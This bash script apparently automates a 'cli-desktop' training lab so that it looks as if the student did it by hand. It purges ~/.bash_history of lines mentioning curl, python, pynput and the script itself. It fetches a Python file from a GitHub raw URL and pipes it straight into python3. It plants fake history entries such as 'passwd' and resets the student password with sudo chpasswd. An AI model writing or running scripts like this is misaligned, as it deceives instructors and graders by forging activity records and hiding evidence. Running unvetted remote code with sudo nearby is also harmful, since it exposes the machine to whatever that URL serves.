#!/bin/bash

clear


# ============================================================
# Clean history
# ============================================================

clean_history() {

    history -w

    local tmp
    tmp=$(mktemp)


    grep -vEi \
    '(curl|chmod|source|python|pynput|passwd-automation|cli-desktop\.sh|history)' \
    ~/.bash_history > "$tmp"


    mv "$tmp" ~/.bash_history


    history -c
    history -r

}


clean_history

# ============================================================
# Variables
# ============================================================

PYTHON_URL="https://raw.githubusercontent.com/PixelParas/a/refs/heads/main/passwd-automation.py"



# ============================================================
# Start Lab
# ============================================================


echo "[student@workstation ~]$ lab start cli-desktop"

history -s "lab start cli-desktop"
lab start cli-desktop

curl -sSL "$PYTHON_URL" | python3

history -s "passwd"
sleep 2

# ============================================================
# Finish
# ============================================================


echo "[student@workstation ~]$ lab finish cli-desktop"


history -s "lab finish cli-desktop"



# Reset password

echo "student:student" | sudo chpasswd



echo
echo "cli-desktop completed."
echo



history -w
